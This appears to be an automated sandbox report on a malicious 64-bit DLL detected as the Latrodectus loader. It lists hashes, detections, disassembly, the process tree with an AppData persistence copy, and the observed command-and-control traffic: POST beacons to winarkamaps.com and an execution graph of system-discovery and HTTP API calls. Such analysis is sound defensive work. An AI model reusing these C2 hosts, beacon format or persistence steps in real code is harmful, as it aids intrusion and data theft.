                        SHA-256:9645A12079EDFFD20560D4631160A6052AE5728D6F73B7366588166AD281C534
                        SHA-512:8EFBA2B2CB757DECC55C7B2AEDB1A7B2645D95DDB22087F20D713456BFB6D09B90779370E7C8D8E567D22D8E96D7239F9B65152C6879CBDF9258CF02F690C7A0
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, Author: Joe Security
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 66%
                        • Antivirus: Virustotal, Detection: 80%, Browse
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{............p.+...........D......D......D.....Rich............PE..d...N..f.........." .........4......|<.......................................@............`.............................................x.......<............ ...............0..........................................................@............................text............................... ..`.rdata..............................@..@.data...`#..........................@....pdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Entropy (8bit):5.602203637771727
                        TrID:
                        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                        • Win64 Executable (generic) (12005/4) 10.17%
                        • Generic Win/DOS Executable (2004/3) 1.70%
                        • DOS Executable Generic (2002/1) 1.70%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                        File name:r2iL9TLvO3.dll
                        File size:61'440 bytes
                        MD5:d46476f7f27be8ef618b7646a46f5e66
                        SHA1:8219d1ead31d16f6380941827bf96a488453d5c0
                        SHA256:9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534
                        SHA512:8efba2b2cb757decc55c7b2aedb1a7b2645d95ddb22087f20d713456bfb6d09b90779370e7c8d8e567d22d8e96d7239f9b65152c6879cbdf9258cf02f690c7a0
                        SSDEEP:768:f0Io0O99dyyus8GhrFuNtxv4c/HFGKndcHrqzwzv1NTNaTWsyih:caO9qyVNKv4c/HFGLlzvi
                        TLSH:F5534F87EBA261E9DCBAD57486637527F8707C4D5038BB0A8F619E136F22720F52C784
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..............p.+..............D.......D.......D......Rich............PE..d...N..f.........." .........4......|<.............
                        Icon Hash:7ae282899bbab082
                        Entrypoint:0x180003c7c
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x180000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6613D54E [Mon Apr 8 11:30:22 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:db7aeb75528663639689f852fd366243
                        Instruction
                        dec esp
                        mov dword ptr [esp+18h], eax
                        mov dword ptr [esp+10h], edx
                        dec eax
                        mov dword ptr [esp+08h], ecx
                        dec eax
                        sub esp, 18h
                        mov eax, dword ptr [esp+28h]
                        mov dword ptr [esp], eax
                        cmp dword ptr [esp], 01h
                        je 00007F24AD201114h
                        jmp 00007F24AD20111Eh
                        dec eax
                        mov eax, dword ptr [esp+20h]
                        dec eax
                        mov dword ptr [0000C837h], eax
                        mov eax, 00000001h
                        dec eax
                        add esp, 18h
                        ret
                        int3
                        dec eax
                        sub esp, 38h
                        call 00007F24AD200CC0h
                        mov dword ptr [esp+20h], eax
                        cmp dword ptr [esp+20h], 00000000h
                        jne 00007F24AD201125h
                        xor eax, eax
                        cmp eax, 01h
                        je 00007F24AD20111Eh
                        mov ecx, 000003E8h
                        call 00007F24AD209D70h
                        jmp 00007F24AD2010FFh
                        xor eax, eax
                        dec eax
                        add esp, 38h
                        ret
                        int3
                        int3
                        dec eax
                        sub esp, 28h
                        call 00007F24AD2010DCh
                        xor eax, eax
                        dec eax
                        add esp, 28h
                        ret
                        dec esp
                        mov dword ptr [esp+18h], eax
                        mov dword ptr [esp+10h], edx
                        dec eax
                        mov dword ptr [esp+08h], ecx
                        dec eax
                        sub esp, 000001C8h
                        cmp dword ptr [esp+000001D8h], 12h
                        je 00007F24AD201152h
                        cmp dword ptr [esp+000001D8h], 0Eh
                        je 00007F24AD201148h
                        cmp dword ptr [esp+000001D8h], 0Ch
                        je 00007F24AD20113Eh
                        cmp dword ptr [esp+000001D8h], 0Dh
                        je 00007F24AD201134h
                        cmp dword ptr [esp+000001D8h], 0Fh
                        je 00007F24AD20112Ah
                        cmp dword ptr [esp+000001D8h], 04h
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0xe4800x78.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe4f80x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x120000x6d8.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x130000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xe0900x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0xe0000x40.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xc3cc0xc400daced1e25a37750d3e573d26743527aaFalse0.40439652423469385zlib compressed data5.42109374466797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0xe0000x5d60x6001443fcdf6d941caad8a894b59cbf8317False0.5442708333333334data4.56235176800514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xf0000x23600x1600c6f791ef0b88e56476abb0f454a0cd63False0.5024857954545454data6.676622463781846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x120000x6d80x8005d61590e3fcef31da47c9638e83a1d10False0.4541015625data3.871670986438023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x130000xc0x200f3469c0b0ee9c852546ac64a5d6db5b3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DLLImport
                        KERNEL32.dllPeekNamedPipe, GetLastError, CreateMutexW
                        USER32.dllMessageBeep, MessageBoxA
                        NameOrdinalAddress
                        extra10x180003ce4
                        follower20x180003ce4
                        run30x180003ce4
                        scub40x180003ce4
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 8, 2024 11:40:41.335103989 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.335155964 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.335226059 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.349721909 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.349756956 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.828989029 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.829135895 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.893208027 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.893261909 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.893553972 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:40:41.897325993 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.901226997 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:40:41.944502115 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672075033 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672158957 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.672167063 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672229052 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672512054 CEST49708443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.672533989 CEST44349708188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.770823002 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.770881891 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:20.770953894 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.771253109 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:20.771265984 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.277477026 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.277558088 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.278364897 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.278378963 CEST44349709188.114.96.3192.168.2.7
                        Jul 8, 2024 11:41:21.280271053 CEST49709443192.168.2.7188.114.96.3
                        Jul 8, 2024 11:41:21.280277967 CEST44349709188.114.96.3192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 8, 2024 11:40:41.309509039 CEST5736653192.168.2.71.1.1.1
                        Jul 8, 2024 11:40:41.329724073 CEST53573661.1.1.1192.168.2.7
                        Jul 8, 2024 11:41:20.717067003 CEST6303653192.168.2.71.1.1.1
                        Jul 8, 2024 11:41:20.753175974 CEST53630361.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 8, 2024 11:40:41.309509039 CEST192.168.2.71.1.1.10x3666Standard query (0)winarkamaps.comA (IP address)IN (0x0001)false
                        Jul 8, 2024 11:41:20.717067003 CEST192.168.2.71.1.1.10xa83dStandard query (0)stratimasesstr.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 8, 2024 11:40:41.329724073 CEST1.1.1.1192.168.2.70x3666No error (0)winarkamaps.com188.114.96.3A (IP address)IN (0x0001)false
                        Jul 8, 2024 11:40:41.329724073 CEST1.1.1.1192.168.2.70x3666No error (0)winarkamaps.com188.114.97.3A (IP address)IN (0x0001)false
                        Jul 8, 2024 11:41:20.753175974 CEST1.1.1.1192.168.2.70xa83dName error (3)stratimasesstr.comnonenoneA (IP address)IN (0x0001)false
                        • winarkamaps.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749708188.114.96.34437620C:\Windows\System32\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2024-07-08 09:40:41 UTC228OUTPOST /live/ HTTP/1.1
                        Accept: */*
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Host: winarkamaps.com
                        Content-Length: 252
                        Cache-Control: no-cache
                        2024-07-08 09:40:41 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41
                        Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA
                        2024-07-08 09:41:20 UTC737INHTTP/1.1 522
                        Date: Mon, 08 Jul 2024 09:41:20 GMT
                        Content-Type: text/plain; charset=UTF-8
                        Content-Length: 15
                        Connection: close
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bxzd0xFqHv6A62r6fwPVvTaEZSKvPmQSGyyowF%2BeMQ0UBCHz37nntcBM3xmi6htiI5IslgrljYIFQGR65G%2FuyAxNouhsIyx74fZniytv5Ng40QNv5ixvsqXZSbFju3CRQZA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Server: cloudflare
                        CF-RAY: 89ff1d423a374333-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-08 09:41:20 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                        Data Ascii: error code: 522


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.749709188.114.96.34437620C:\Windows\System32\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2024-07-08 09:41:21 UTC228OUTPOST /live/ HTTP/1.1
                        Accept: */*
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                        Host: winarkamaps.com
                        Content-Length: 252
                        Cache-Control: no-cache
                        2024-07-08 09:41:21 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41
                        Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\loaddll64.exe
                        Wow64 process (32bit):false
                        Commandline:loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll"
                        Imagebase:0x7ff622450000
                        File size:165'888 bytes
                        MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Imagebase:0x7ff740e60000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:7
                        Start time:05:39:20
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:05:39:23
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:05:39:26
                        Start date:08/07/2024
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
                        Imagebase:0x7ff617b80000
                        File size:71'680 bytes
                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:31.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:18.7%
                          Total number of Nodes:1023
                          Total number of Limit Nodes:10
                          execution_graph 3961 7ffb1e865750 3964 7ffb1e8657d9 3961->3964 3963 7ffb1e865879 3976 7ffb1e865846 new[] 3964->3976 3985 7ffb1e86c934 NtDelayExecution 3964->3985 3967 7ffb1e86bae0 NtAllocateVirtualMemory 3967->3976 3968 7ffb1e865d53 wsprintfA 3971 7ffb1e86b984 3 API calls 3968->3971 3969 7ffb1e865b3f wsprintfA 3969->3976 3970 7ffb1e865c2e wsprintfA 3970->3976 3971->3976 3973 7ffb1e867b40 NtFreeVirtualMemory 3973->3976 3974 7ffb1e86ad34 NtAllocateVirtualMemory 3974->3976 3975 7ffb1e86b984 3 API calls 3975->3976 3976->3963 3976->3967 3976->3968 3976->3969 3976->3970 3976->3973 3976->3974 3976->3975 3981 7ffb1e8688a4 GetCursorPos GetTickCount RtlRandom 3976->3981 3982 7ffb1e8661b4 GetExitCodeThread 3976->3982 3983 7ffb1e8661ed GetExitCodeThread 3976->3983 3986 7ffb1e86ce20 3976->3986 3992 7ffb1e8652c4 3976->3992 4003 7ffb1e867fa8 3976->4003 4029 7ffb1e866634 3976->4029 4033 7ffb1e864d20 3976->4033 4046 7ffb1e866370 3976->4046 4050 7ffb1e86541c 3976->4050 4062 7ffb1e86c934 NtDelayExecution 3976->4062 3981->3976 3982->3976 3983->3976 3985->3964 3990 7ffb1e86ce2e 3986->3990 3991 7ffb1e86ce30 3986->3991 3987 7ffb1e86ce7e 3989 7ffb1e867b40 NtFreeVirtualMemory 3987->3989 3988 7ffb1e867b40 NtFreeVirtualMemory 3988->3991 3989->3990 3990->3976 3991->3987 3991->3988 3993 7ffb1e8652fc 3992->3993 3994 7ffb1e86ad34 NtAllocateVirtualMemory 3993->3994 3995 7ffb1e865322 3994->3995 3996 7ffb1e86ad34 NtAllocateVirtualMemory 3995->3996 3997 7ffb1e865338 InternetCrackUrlA 3996->3997 3998 7ffb1e8653ae 3997->3998 3999 7ffb1e865394 3997->3999 3998->3976 4000 7ffb1e867b40 NtFreeVirtualMemory 3999->4000 4001 7ffb1e8653a1 4000->4001 4002 7ffb1e867b40 NtFreeVirtualMemory 4001->4002 4002->3998 4004 7ffb1e86ad34 NtAllocateVirtualMemory 4003->4004 4005 7ffb1e867fd6 4004->4005 4006 7ffb1e867fea GetAdaptersInfo 4005->4006 4007 7ffb1e867fe3 4005->4007 4008 7ffb1e868011 4006->4008 4027 7ffb1e8681df 4006->4027 4007->3976 4009 7ffb1e86ad34 NtAllocateVirtualMemory 4008->4009 4011 7ffb1e86801c GetAdaptersInfo 4009->4011 4010 7ffb1e86820c 4013 7ffb1e86ad34 NtAllocateVirtualMemory 4010->4013 4014 7ffb1e868049 4011->4014 4012 7ffb1e867b40 NtFreeVirtualMemory 4012->4010 4015 7ffb1e86821f 4013->4015 4019 7ffb1e86806a wsprintfA 4014->4019 4015->4007 4016 7ffb1e868230 GetComputerNameExA 4015->4016 4017 7ffb1e8682ad GetComputerNameExA 4016->4017 4021 7ffb1e868249 4016->4021 4018 7ffb1e86835f 4017->4018 4023 7ffb1e8682ca 4017->4023 4020 7ffb1e867b40 NtFreeVirtualMemory 4018->4020 4026 7ffb1e868086 4019->4026 4020->4007 4022 7ffb1e86827e wsprintfA 4021->4022 4022->4017 4024 7ffb1e86832a wsprintfA 4023->4024 4024->4018 4025 7ffb1e8681ab wsprintfA 4025->4026 4025->4027 4026->4025 4026->4027 4028 7ffb1e868136 wsprintfA 4026->4028 4027->4010 4027->4012 4028->4026 4030 7ffb1e866649 4029->4030 4032 7ffb1e86665a 4029->4032 4031 7ffb1e86ad34 NtAllocateVirtualMemory 4030->4031 4030->4032 4031->4032 4032->3976 4036 7ffb1e864d55 4033->4036 4034 7ffb1e8652c4 3 API calls 4034->4036 4035 7ffb1e864c70 InternetOpenW InternetConnectA 4035->4036 4036->4034 4036->4035 4037 7ffb1e867b40 NtFreeVirtualMemory 4036->4037 4038 7ffb1e864eb5 4036->4038 4039 7ffb1e86bae0 NtAllocateVirtualMemory 4036->4039 4063 7ffb1e865030 4036->4063 4076 7ffb1e864f58 4036->4076 4037->4036 4040 7ffb1e864f2e InternetCloseHandle 4038->4040 4041 7ffb1e864f39 4038->4041 4039->4036 4040->4041 4043 7ffb1e864f41 InternetCloseHandle 4041->4043 4044 7ffb1e864f4c 4041->4044 4043->4044 4044->3976 4047 7ffb1e866386 4046->4047 4048 7ffb1e86ad34 NtAllocateVirtualMemory 4047->4048 4049 7ffb1e8663a3 4047->4049 4048->4049 4049->3976 4051 7ffb1e865486 4050->4051 4052 7ffb1e86bae0 NtAllocateVirtualMemory 4051->4052 4060 7ffb1e8654a7 4052->4060 4053 7ffb1e8654b4 4053->3976 4054 7ffb1e86ce20 NtFreeVirtualMemory 4054->4060 4055 7ffb1e865738 4120 7ffb1e86d1c8 4055->4120 4058 7ffb1e867b40 NtFreeVirtualMemory 4058->4053 4059 7ffb1e86ccbc 2 API calls 4059->4060 4060->4053 4060->4054 4060->4055 4060->4059 4081 7ffb1e863cf4 4060->4081 4062->3976 4064 7ffb1e86507f 4063->4064 4065 7ffb1e8650f5 4064->4065 4066 7ffb1e865175 4064->4066 4067 7ffb1e86512a HttpOpenRequestA 4065->4067 4068 7ffb1e8651aa HttpOpenRequestA 4066->4068 4069 7ffb1e8651f3 4067->4069 4068->4069 4070 7ffb1e86522d 4069->4070 4071 7ffb1e86520a InternetSetOptionA 4069->4071 4073 7ffb1e8651fb 4069->4073 4072 7ffb1e86527f HttpSendRequestA 4070->4072 4074 7ffb1e865237 4070->4074 4071->4070 4072->4073 4073->4036 4075 7ffb1e865254 HttpSendRequestA 4074->4075 4075->4073 4077 7ffb1e864fa1 InternetReadFile 4076->4077 4078 7ffb1e864fe9 4077->4078 4080 7ffb1e864fc3 4077->4080 4078->4036 4079 7ffb1e86b058 3 API calls 4079->4080 4080->4077 4080->4078 4080->4079 4119 7ffb1e863d13 4081->4119 4082 7ffb1e863fac 4084 7ffb1e863fb7 4082->4084 4085 7ffb1e86405a 4082->4085 4083 7ffb1e863ff6 4086 7ffb1e864092 ExitProcess 4083->4086 4087 7ffb1e864001 4083->4087 4088 7ffb1e863fc2 4084->4088 4089 7ffb1e8640d6 4084->4089 4090 7ffb1e866e04 21 API calls 4085->4090 4091 7ffb1e8640c2 4087->4091 4101 7ffb1e86400c 4087->4101 4093 7ffb1e8640ad 4088->4093 4094 7ffb1e863fcd 4088->4094 4260 7ffb1e861a08 4089->4260 4095 7ffb1e864066 4090->4095 4216 7ffb1e864110 4091->4216 4183 7ffb1e861c38 CreateToolhelp32Snapshot 4093->4183 4098 7ffb1e8640bb 4094->4098 4099 7ffb1e863fd8 4094->4099 4096 7ffb1e863ff1 4095->4096 4104 7ffb1e863c2c 3 API calls 4095->4104 4096->4060 4215 7ffb1e862118 CreateThread 4098->4215 4102 7ffb1e863fdf 4099->4102 4103 7ffb1e864046 4099->4103 4101->4096 4280 7ffb1e8672c8 4101->4280 4108 7ffb1e86409c 4102->4108 4109 7ffb1e863fea 4102->4109 4147 7ffb1e866e04 4103->4147 4110 7ffb1e86406f 4104->4110 4168 7ffb1e866c2c 4108->4168 4109->4096 4134 7ffb1e867170 4109->4134 4112 7ffb1e863a24 8 API calls 4110->4112 4114 7ffb1e864074 4112->4114 4159 7ffb1e863808 4114->4159 4117 7ffb1e866e04 21 API calls 4118 7ffb1e864088 ExitProcess 4117->4118 4119->4082 4119->4083 4121 7ffb1e86573d 4120->4121 4132 7ffb1e86d1dc new[] 4120->4132 4121->4058 4122 7ffb1e86d20e 4123 7ffb1e86d378 4122->4123 4125 7ffb1e867b40 